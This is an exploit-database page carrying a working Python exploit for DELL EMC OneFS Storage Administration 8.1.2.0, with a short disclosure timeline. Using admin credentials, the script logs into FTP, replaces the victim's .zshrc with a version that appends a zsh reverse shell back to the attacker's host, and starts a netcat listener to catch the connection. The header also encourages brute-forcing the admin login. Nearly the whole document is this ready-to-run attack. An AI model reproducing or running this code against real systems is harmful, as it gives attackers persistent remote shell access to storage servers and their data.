DELL EMC OneFS Storage Administration 8.1.2.0 .zshrc Overwrite



EKU-ID: 8047 CVE: OSVDB-ID:
Author: wetw0rk Published: 2018-10-11 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/env python
#
# Exploit name      : isilon-onefs-brute.py
# Created date      : 9/21/18
# Submit Date       : 10/10/18
# Author            : wetw0rk
# Python version    : 2.7
# Brute Force Script: https://github.com/wetw0rk/Exploit-Development/blob/master/DELL%20EMC%20OneFS%20Storage%20Administration%20%3C%208.1.2.0/isilon-onefs-brute.py 
# Vendor Homepage   : https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm
# Software Link     : https://downloads.emc.com/emc-com/usa/Isilon/EMC_Isilon_OneFS_8.1.2.0_Simulator.zip
# Tested on         : DELL EMC OneFS Storage Administration 8.1.2.0
#
# Greetz: Hima (thanks for helping me think of .bashrc), Fr13ndzSec, AbeSnowman, Berserk, Neil
#
# [------------ Timeline ------------]
#   9/21/18 - Contacted Dell PSIRT
#   9/25/18 - Sent POC code
#   10/9/18 - Responded with "not considered a vulnerability"
#
# Description :
#   To exploit this vulnerability first you must gain access to the administrative
#   interface on 8080 (note no lockouts so you can bruteforce E Z). Once in enable
#   FTP like so:
#     -> Protocols -> FTP Settings -> Enable the service and transfers -> With that done, exploit!
#
#   Since you're dropped in the user home directory and not a secluded FTP directory
#   you can inject into .zshrc, however as dell stated you can access other files on
#   the system as well....
#

import os
import sys
import socket
import threading

RED = "\033[1m\033[31m[-]\033[0m"
BLUE = "\033[1m\033[94m[*]\033[0m"
GREEN = "\033[1m\033[92m[+]\033[0m"

def background_server(lhost):
    global check

    fd = open(".zshrc", 'w')

    host = "0.0.0.0"
    port = 50121
    sock = socket.socket(
        socket.AF_INET,
        socket.SOCK_STREAM
    )
    sock.bind((host, port))
    sock.listen(5)

    print("%s listening on %s:%s" % (BLUE, host,port))
    while True:
        conn, addr = sock.accept()
        if check != 1:
            zshrc_file = conn.recv(4096)
            print("%s generating .zshrc payload" % BLUE)
            fd.write(zshrc_file)
            # msfvenom -a cmd --platform unix -p cmd/unix/reverse_zsh LHOST=192.168.245.136 LPORT=443 -f raw
            fd.write("zsh -c 'zmodload zsh/net/tcp && ztcp %s 443 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' &\n" % lhost)
            fd.close()
        else:
            with open('.zshrc', 'r') as myfile:
                data=myfile.read()
            conn.send(data)

try:
    rhost = sys.argv[1]
    rport = int(sys.argv[2])
    lhost = sys.argv[3]
    username = sys.argv[4]
    password = sys.argv[5]
except:
    print("Usage: ./%s <rhost> <rport> <lhost> <username> <password>" % sys.argv[0])
    print("Example: ./%s 192.168.245.3 21 192.168.245.136 admin admin" % sys.argv[0])
    exit(0)

check = 0 # start a background server for download+uploads
server_thread = threading.Thread(target=background_server, args=(lhost,))
server_thread.start()

# create a socket for the client sending the commands
print("%s connecting to %s:%s" % (BLUE, rhost, rport))
csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect((rhost, rport))
csock.recv(4096)
print("%s performing login to OneFS using %s:%s" % (BLUE, username, password))
csock.send("USER %s\r\n" % username)
csock.recv(4096)
csock.send("PASS %s\r\n" % password)
csock.recv(4096)
print("%s login was successful downloading .zshrc" % GREEN)
csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121
csock.recv(4096)
csock.send("RETR .zshrc\r\n")
csock.recv(4096)
csock.send("RNFR .zshrc\r\n")
csock.recv(4096)
print("%s renaming remote .zshrc to .backup" % GREEN)
csock.send("RNTO .backup\r\n")
csock.recv(4096)
check = 1
print("%s uploading payload to target host" % GREEN)
csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121
csock.recv(4096)
csock.send("TYPE I\r\n")
csock.recv(4096)
csock.send("STOR .zshrc\r\n")
print("%s exploitation complete waiting for %s to login" % (GREEN, username))
os.system("nc -lvp 443")
csock.close()